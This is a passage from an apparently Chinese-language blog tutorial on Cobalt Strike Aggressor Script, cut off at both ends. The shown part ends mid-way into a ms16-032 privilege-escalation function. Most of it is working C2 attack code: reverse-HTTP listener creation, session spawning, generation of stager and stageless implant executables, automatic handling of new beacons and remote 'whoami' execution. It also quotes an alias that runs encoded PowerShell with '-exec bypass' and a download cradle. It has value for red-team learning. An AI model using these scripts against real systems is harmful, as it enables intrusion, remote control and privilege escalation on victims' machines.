string">&quot;创建的名称&quot;</span>,<span class="token string">&quot;选择的payload&quot;</span>,%<span class="token punctuation">(</span><span class="token string">&quot;选择的payload需要填上的参数&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>实践</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>listener_create_ext<span class="token punctuation">(</span><span class="token string">&quot;我的HTTP监听&quot;</span>,<span class="token string">&quot;windows/beacon_http/reverse_http&quot;</span>,%<span class="token punctuation">(</span>host<span class="token operator">=</span><span class="token operator">&gt;</span><span class="token string">&quot;IP或者域名&quot;</span>,port<span class="token operator">=</span><span class="token operator">&gt;</span><span class="token number">1080</span>,beacons <span class="token operator">=</span><span class="token operator">&gt;</span><span class="token string">&quot;IP或者域名&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
printAll<span class="token punctuation">(</span>listeners<span class="token punctuation">(</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;创建成功！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>由于我的端口被占用，我先删除一下：</p> <p><img src="/images/Aggressor-Script/image-20201213222945393.png" alt="image-20201213222945393"></p> <p>然后运行 cna 并查看：</p> <p><img src="/images/Aggressor-Script/image-20201213223523971.png" alt="image-20201213223523971"> <img src="/images/Aggressor-Script/image-20201213223612288.png" alt="image-20201213223612288">
成功创建，我们这里的参数并没有全部按照啥要求填满，和我们平时 GUI 创建是一样的。在原文中提到过一个 代理问题 ，这里我没写，因为我感觉用的比较少</p></li> <li><p>会话传递</p> <p>在我们日常使用的时候，我们会将会话传递(Spawn)，比如将会话传递到 MSF 中，或者传递 SMB 到其他会话，下面是这个操作的源码：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>item <span class="token string">&quot;&amp;Spawn&quot;</span> <span class="token punctuation">{</span>
	openPayloadHelper<span class="token punctuation">(</span>lambda<span class="token punctuation">(</span><span class="token punctuation">{</span>
		binput<span class="token punctuation">(</span><span class="token variable">$bids</span>, <span class="token string">&quot;spawn x86 <span class="token variable">$1</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		bspawn<span class="token punctuation">(</span><span class="token variable">$bids</span>, <span class="token variable">$1</span>, <span class="token string">&quot;x86&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>, <span class="token variable">$bids</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token variable">$1</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>这里面设计到多个 数据模型 ，我们一个一个的讲解。</p> <ul><li><p>openpayloadHelper： 打开我们拥有的 Listener 会话框：</p></li> <li><p>bspawn：创建新的会话，需要传递一个会话ID</p></li></ul></li></ul> <div class="language-java line-numbers-mode"><pre class="language-java"><code>    popup beacon_bottom<span class="token punctuation">{</span>
    	<span class="token function">item</span><span class="token punctuation">(</span><span class="token string">&quot;&amp;会话传递&quot;</span><span class="token punctuation">,</span><span class="token punctuation">{</span><span class="token function">openPayloadHelper</span><span class="token punctuation">(</span><span class="token function">lambda</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
    	<span class="token function">bspawn</span><span class="token punctuation">(</span>$bid<span class="token punctuation">,</span> $<span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  	<span class="token function">println</span><span class="token punctuation">(</span><span class="token string">&quot;我们传递的监听器是&quot;</span><span class="token punctuation">.</span>$<span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">}</span><span class="token punctuation">,</span># 
        $bid <span class="token operator">=</span><span class="token operator">&gt;</span> $<span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>​<br>
当openpayladhelper打开存在的Listener会话时，他需要接受一个值，这个值是选定的监听器，然后这里将这个值传递给bspawn，bsapwn需要接受的第一个值也是选定的监听器（bspawn是生成一个新的会话），所以这里我们的将选择的监听器传递给bspawn就可以传递会话，这个地方的写法是固定的，单独的将openPayloadHelper使用是不可以的，但是baspwn是可以的，当运行上面的内容以后，我们可以查看<code>$1</code>的值，你会发现就是我们所选择的监听器：
​<br> <img src="/images/Aggressor-Script/image-20201214112030750.png" alt="image-20201214112030750">
​<br> <img src="/images/Aggressor-Script/image-20201214112048256.png" alt="image-20201214112048256"></p> <p><img src="/images/Aggressor-Script/image-20201214112103471.png" alt="image-20201214112103471"></p> <p>​</p> <p>这样我们也算是重写了我们 Spwan的数据模型</p> <p>官方菜单写法中，使用的是 <code>binput</code>，这个 数据模型 是用来在Becon 中显示我们执行的命令的，下面是官方的写法的结果：
<img src="/images/Aggressor-Script/image-20201214112330479.png" alt="image-20201214112330479"></p> <h2 id="stagers">Stagers <a href="#stagers" class="header-anchor">#</a></h2> <blockquote><p>Stager我只能根据我的理解来描述，肯定会和很多师傅的不相同，仅作为参考</p></blockquote> <p>Stage（阶段）指的是分阶段，他没有含义，仅仅是指的这种类型，分阶段木马一般是我们在目标上无法使用较大的文件或者命令时使用，使用这样的方式分阶段的一个一个的从远端下载我们的代码，然后传输到受控段</p> <p>Stager指加载器，例如下面这个截图：</p> <p><img src="/images/Aggressor-Script/image-20201214141457999.png" alt="image-20201214141457999"></p> <p>这里我们使用 Stager 去请求我设置的URL，所以我们可以将Stager理解为加载器，加载远端的代码；在官方文档中是这么解释的：Stager 是一个微型程序，它可以下载有效荷载并且接收，适合运用于有大小限制的程序，例如用户的驱动攻击。</p> <p>我们可以适应 stager 数据模型将我们的信息打印出来，使用它需要输入两个参数</p> <p><code>$1</code> Listener 名字</p> <p><code>$2</code> 选择位数 x86 | x64</p> <p>我们在控制台可以查看一下：
<img src="/images/Aggressor-Script/image-20201214142943361.png" alt="image-20201214142943361"></p> <p>其次就是使用 artifact_stager 数据模型生成我们的可执行文件，或者其他类型的木马，他需要接受3个参数：
<code>$1</code> 监听器的名字</p> <p><code>$2</code> 生成文件的类型，比如exe</p> <p><code>$3</code> 选择位数 x86 | x64</p> <p>下面是<code>$2</code> 的可选的参数</p> <table><thead><tr><th>类型</th> <th>说明</th></tr></thead> <tbody><tr><td>dll</td> <td>一个 dll 程序</td></tr> <tr><td>exe</td> <td>一个可执行的 exe 程序</td></tr> <tr><td>powershell</td> <td>一个powershll执行程序</td></tr> <tr><td>python</td> <td>一个python的程序</td></tr> <tr><td>raw</td> <td>原始文件</td></tr> <tr><td>svcexe</td> <td>一个svc.exe程序</td></tr> <tr><td>vbscript</td> <td>生成Vbs文件</td></tr></tbody></table> <p>我们使用 artifact_stager进行生成：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token variable">$data</span> <span class="token operator">=</span> artifact_stager<span class="token punctuation">(</span><span class="token string">&quot;Tencent&quot;</span>, <span class="token string">&quot;exe&quot;</span>, <span class="token string">&quot;x64&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">#选择监听器、生成类型、位数</span>

<span class="token variable">$handle</span> <span class="token operator">=</span> openf<span class="token punctuation">(</span><span class="token string">&quot;&gt;Kris.exe&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 生成的路径，这里是在当前执行的路径下</span>
writeb<span class="token punctuation">(</span><span class="token variable">$handle</span>, <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 写入</span>
closef<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 关闭写入，不关闭会一直卡住	</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>我们执行:</p> <p><img src="/images/Aggressor-Script/image-20201214145716511.png" alt="image-20201214145716511"></p> <p>然后运行这个木马，看看是否可以上线：</p> <p><img src="/images/Aggressor-Script/image-20201214145811630.png" alt="image-20201214145811630"></p> <p>可以上线，在GUI中也是使用的这个 数据模型 创建。</p> <h2 id="local-stagers">Local Stagers <a href="#local-stagers" class="header-anchor">#</a></h2> <blockquote><p>本地的Stager信息</p></blockquote> <p>我们上面提到了监听器的信息有 本地监听器和云端监听器，那么对于本地的正向链接的 TCP Listener 我们就可以使用 stager_bind_tcp 这个数据模型来查看，这个数据模型只能查看 TCP 类型的 Stager，他需要接受三个参数：</p> <p><code>$1</code> 我们创建的 TCP 监听名字</p> <p><code>$2</code> 监听器的位数</p> <p><code>$3</code> 监听器的链接端口</p> <p>我们使用下面的代码查看一下我们的 TCP stager信息：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token variable">$TcpStager</span> <span class="token operator">=</span> stager_bind_tcp<span class="token punctuation">(</span><span class="token string">&quot;你的TCP监听器名称&quot;</span>,<span class="token string">&quot;位数&quot;</span>,<span class="token string">&quot;bind to 端口&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
elog<span class="token punctuation">(</span><span class="token variable">$TcpStager</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215142818777.png" alt="image-20201215142818777"></p> <p><img src="/images/Aggressor-Script/image-20201215142751398.png" alt="image-20201215142751398"></p> <p>实测加了端口也没有变化：</p> <p><img src="/images/Aggressor-Script/image-20201215142952923.png" alt="image-20201215142952923"></p> <h2 id="named-pipe-stager">Named Pipe Stager <a href="#named-pipe-stager" class="header-anchor">#</a></h2> <p>Pipe Stager是内网渗透中，用于不能出网的主机的一种加载器，他只有 X86 的选择，我们可以使用 stager_bind_pipe 数据模型导出对应的 SMB 监听，他需要接受的参数如下：</p> <p><code>$1</code> 监听器的名称</p> <p>他只需要这一个参数，CS4.0以后我们创建 SMB 链接只需要填写监听器名称，其他的都会自动填上。</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token variable">$SMB_stager</span> <span class="token operator">=</span> stager<span class="token punctuation">(</span><span class="token string">&quot;SMB&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
elog<span class="token punctuation">(</span><span class="token variable">$SMB_stager</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215143849447.png" alt="image-20201215143849447"></p> <h2 id="stageless-payloads">Stageless Payloads <a href="#stageless-payloads" class="header-anchor">#</a></h2> <p>stageless 和stageless相反，指的是无阶段；stageless payloads 是指无阶段的荷载信息，我们可以使用 payload 数据模型导出所有的信息：</p> <p><code>$1</code> 监听器的名字</p> <p><code>$2</code>机器位数 x86 | x64</p> <p><code>$3</code> 进程名字</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token variable">$data</span> <span class="token operator">=</span> payload<span class="token punctuation">(</span><span class="token string">&quot;Tencent&quot;</span>, <span class="token string">&quot;x64&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$handle</span> <span class="token operator">=</span> openf<span class="token punctuation">(</span><span class="token string">&quot;&gt;out.bin&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
writeb<span class="token punctuation">(</span><span class="token variable">$handle</span>, <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
closef<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215151750713.png" alt="image-20201215151750713"></p> <p>保存成功，然后我们可以使用 hex 打开看看内容：</p> <p><img src="/images/Aggressor-Script/image-20201215151825407.png" alt="image-20201215151825407"></p> <h1 id="beacon">Beacon <a href="#beacon" class="header-anchor">#</a></h1> <blockquote><p>信标，它是C2在异步开发后的代理（机翻...），个人理解是指上线的主机</p></blockquote> <h2 id="元数据">元数据 <a href="#元数据" class="header-anchor">#</a></h2> <p>C2在我们的（主机）信标上线以后，都会为他们分配一个独一无二的会话 ID，这个ID是一个随机数，Cobalt Strike将任务和元数据与每个信标的ID关联，我们可以使用 beacon_ids 数据模型获得当前所有会话的 ID 号码：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>x beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token comment">#获取所有的会话ID</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215153615139.png" alt="image-20201215153615139"></p> <p>我们可以利用得到的  会话ID 使用 beacon_info 数据模型得到所有的数据，我们会返回一个数组：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>x beacon_info<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token comment">#获取所有信息</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215153945572.png" alt="image-20201215153945572"></p> <p>可以使用字典的操作，</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>x beacon_info<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">&quot;os&quot;</span><span class="token punctuation">]</span> <span class="token comment">#获取os信息</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215154130011.png" alt="image-20201215154130011"></p> <p>于是我们可以循环取出这个会话ID的所有信息：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">command</span> show_all <span class="token punctuation">{</span>
	foreach <span class="token variable">$entry</span> <span class="token punctuation">(</span>beacons<span class="token punctuation">(</span><span class="token punctuation">))</span> <span class="token punctuation">{</span> <span class="token comment"># 循环取出 会话ID</span>
		println<span class="token punctuation">(</span><span class="token string">&quot;== &quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot;会话ID&quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot;【&quot;</span><span class="token builtin class-name">.</span> <span class="token variable">$entry</span><span class="token punctuation">[</span><span class="token string">'id'</span><span class="token punctuation">]</span> <span class="token builtin class-name">.</span><span class="token string">&quot;】&quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot;的信息如下&quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot; ==&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		foreach <span class="token variable">$key</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token variable">$value</span> <span class="token punctuation">(</span><span class="token variable">$entry</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token comment"># 根据 ID 以次取出对应的 key和value</span>
			println<span class="token punctuation">(</span><span class="token string">&quot;$[15]key : <span class="token variable">$value</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
		println<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215154601528.png" alt="image-20201215154601528"></p> <p>除此以外还可以使用 beacons 数据模型返回所有信息：</p> <p><img src="/images/Aggressor-Script/image-20201215154750767.png" alt="image-20201215154750767"></p> <h2 id="alias">Alias <a href="#alias" class="header-anchor">#</a></h2> <p>我们可以使用 Alias 为Beacon的添加新的别名，和Aggressor Script一样，我们可以自定义函数或者代码</p> <p>他有三个参数：</p> <p><code>$0</code> 是我们起的别名和传输的参数</p> <p><code>$1</code> 是当前会话的 ID</p> <p><code>$2-3-4....</code>第二个参数及以后，就是我们 是我们传递的参数，他们由空格隔开，我们举一个例子：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">alias</span> info <span class="token punctuation">{</span>
	blog<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;我的名字是 <span class="token variable">$2</span> ，今年 <span class="token variable">$3</span> 岁了，住在 <span class="token variable">$4</span> &quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215173708003.png" alt="image-20201215173708003"></p> <p><strong>一定要注意格式！变量两边是空格，不然会运行不上，如下：</strong></p> <p><img src="/images/Aggressor-Script/image-20201215173830729.png" alt="image-20201215173830729"></p> <h2 id="reacting-to-new-beacons">Reacting to new Beacons <a href="#reacting-to-new-beacons" class="header-anchor">#</a></h2> <p>我们可以使用 beacon_initial 这个事件来为我们主机上线是执行操作，这里我们设置一下，当主机上线是读取他的信息，然后弹处窗口告诉我们，beacon_initial 触发时会返回一个 会话 ID，也只会返回这一个值，我们可以利用这个 会话ID 去读取信息：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>on beacon_initial {
	show_message(&quot;你有新的主机上线！\n会话ID为：$1 \nOS为：&quot;.beacon_info($1,&quot;os&quot;).&quot;\n内网地址为:&quot;.beacon_info($1,&quot;internal&quot;)); 
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215175511736.png" alt="image-20201215175511736"></p> <h2 id="reacting-to-new-dns-beacons">Reacting to new DNS Beacons <a href="#reacting-to-new-dns-beacons" class="header-anchor">#</a></h2> <p>但是上面的这种方式是不适合DNS上线的，因为当DNS主机上线时，是没有进行数据交互的，需要我们主动切换数据的交互类型，我们使用上面的的代码试试看：</p> <p><img src="/images/Aggressor-Script/2.gif" alt="2"></p> <p>没有触发我们的配置，那么当我们改变他的通信方式以后看看结果：</p> <p><img src="/images/Aggressor-Script/image-20201215194614464.png" alt="image-20201215194614464"></p> <p>切换以后我们就得到了回应，为了解决这种问题，我们就可以使用 beacon_initial_empty 事件在得到一个 DNS 信标的时候执行命令</p> <p>他和 beacon_initial 一样，第一个参数是得到的新的信标的 会话ID，我们编写下面的代码，当 DNS 信标回来以后我们自动执行切换通信方式:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>on beacon_initial_empty <span class="token punctuation">{</span>
	bmode<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;dns-txt&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	bcheckin<span class="token punctuation">(</span><span class="token variable">$1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

on beacon_initial <span class="token punctuation">{</span>
	show_message<span class="token punctuation">(</span><span class="token string">&quot;你有新的主机上线！<span class="token entity" title="\n">\n</span>会话ID为：<span class="token variable">$1</span> <span class="token entity" title="\n">\n</span>OS为：&quot;</span>.beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;os&quot;</span><span class="token punctuation">)</span>.<span class="token string">&quot;<span class="token entity" title="\n">\n</span>内网地址为:&quot;</span>.beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;internal&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><ul><li><p>bmode 数据模型 可接受2个参数，用于切换数据传输方式
<code>$1</code> DNS信标的 会话ID</p> <p><code>$2</code> 修改 DNS 信标的会话方式（例如dns，dns6或dns-txt）</p></li> <li><p>bcheckin 数据模型 接受一个参数，用来强制回连
<code>$1</code> 信标的 会话ID</p></li></ul> <p>上面的代码实现的作用是，当我们的 DNS 信标回连以后，切换 DNS信标 的数据方式，并且要求强制回连，然后在打印我们的信息，运行结果如下：</p> <p><img src="/images/Aggressor-Script/3.gif" alt="3"></p> <p>这样就解决了问题</p> <h2 id="beacon-bottom-beacon-top">beacon_bottom &amp;&amp; beacon_top <a href="#beacon-bottom-beacon-top" class="header-anchor">#</a></h2> <p>在信标右键加上我们的菜单，和最开头的操作是一样的，使用这个 beacon_bottom HOOK 可以建立一个 信标 的右键选项，这个右键选项会在最后一行加上，如果想要让他显示在最顶端的话，我们可以使用 beacon_top HOOK将他的位置放在最上面：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>popup beacon_bottom{
	item(&quot;&amp;在最下方&quot;,{});
}

popup beacon_top{
	item(&quot;在最下方&quot;,{});
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215204731123.png" alt="image-20201215204731123"></p> <h2 id="the-logging-contract">The Logging Contract <a href="#the-logging-contract" class="header-anchor">#</a></h2> <p>在 C2 3.0以上的版本对用户的输入记录有非常详细的记录，对每个信标执行的命令都会以记录对应得时间戳和用户名，Cobalt Strike客户端中的Beacon控制台处理这些日志记录，这些记录都是使用 binput 数据模型进行操作，他需要接收两个参数：</p> <p><code>$1</code> 信标的会话ID</p> <p><code>$2</code> 在beacon 中显示的信息</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>binput<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>,<span class="token string">&quot;在beacon中显示的信息&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215211647740.png" alt="image-20201215211647740"></p> <p>我们这里是直接输出的东西，我们也可以将这个东西改为命令：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>binput<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>,bshell<span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>,<span class="token string">&quot;whoami&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215213105909.png" alt="image-20201215213105909"></p> <h2 id="conquering-the-shell">Conquering the Shell <a href="#conquering-the-shell" class="header-anchor">#</a></h2> <blockquote><p>官方文档这里是在讲解 beacon 中的 powershell命令是怎么来的，我不做翻译，但是吧官方为文档贴出来</p></blockquote> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># powershell 的编写源码</span>

<span class="token builtin class-name">alias</span> powershell <span class="token punctuation">{</span>
	local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$args</span> <span class="token variable">$cradle</span> <span class="token variable">$runme</span> <span class="token variable">$cmd</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># $0 is the entire command with no parsing.</span>
	<span class="token variable">$args</span>   <span class="token operator">=</span> substr<span class="token punctuation">(</span><span class="token variable">$0</span>, <span class="token number">11</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># generate the download cradle (if one exists) for an imported PowerShell script</span>
	<span class="token variable">$cradle</span> <span class="token operator">=</span> beacon_host_imported_script<span class="token punctuation">(</span><span class="token variable">$1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># encode our download cradle AND cmdlet+args we want to run</span>
	<span class="token variable">$runme</span>  <span class="token operator">=</span> base64_encode<span class="token punctuation">(</span> str_encode<span class="token punctuation">(</span><span class="token variable">$cradle</span> <span class="token builtin class-name">.</span> <span class="token variable">$args</span>, <span class="token string">&quot;UTF-16LE&quot;</span><span class="token punctuation">)</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># Build up our entire command line.</span>
	<span class="token variable">$cmd</span>    <span class="token operator">=</span> <span class="token string">&quot; -nop -exec bypass -EncodedCommand <span class="token entity" title="\&quot;">\&quot;</span> $+ <span class="token variable">$runme</span> $+ <span class="token entity" title="\&quot;">\&quot;</span>&quot;</span><span class="token punctuation">;</span>
	
	<span class="token comment"># task Beacon to run all of this.</span>
	btask<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Tasked beacon to run: <span class="token variable">$args</span>&quot;</span>, <span class="token string">&quot;T1086&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	beacon_execute_job<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;powershell&quot;</span>, <span class="token variable">$cmd</span>, <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br></div></div><p>下面是 shell 的源码：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">alias</span> shell <span class="token punctuation">{</span>
	local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$args</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$args</span> <span class="token operator">=</span> substr<span class="token punctuation">(</span><span class="token variable">$0</span>, <span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	btask<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Tasked beacon to run: <span class="token variable">$args</span> (OPSEC)&quot;</span>, <span class="token string">&quot;T1059&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	bsetenv<span class="token operator">!</span><span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;_&quot;</span>, <span class="token variable">$args</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	beacon_execute_job<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;%COMSPEC%&quot;</span>, <span class="token string">&quot; /C %_%&quot;</span>, <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><h2 id="privilege-escalation-run-a-command">Privilege Escalation (Run a Command) <a href="#privilege-escalation-run-a-command" class="header-anchor">#</a></h2> <blockquote><p>权限提升的脚本源码</p></blockquote> <p>官方的 ms16-032 权限提升写法</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># Integrate ms16-032</span>
<span class="token comment"># Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc</span>
sub ms16_032_elevator <span class="token punctuation">{</span>
	local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$handle</span> <span class="token variable">$script</span> <span class="token variable">$oneliner</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># acknowledge this command</span>
	btask<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Tasked Beacon to execute <span class="token variable">$2</span> via ms16-032&quot;</span>, <span class="token string">&quot;T1068&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># read in the script</span>
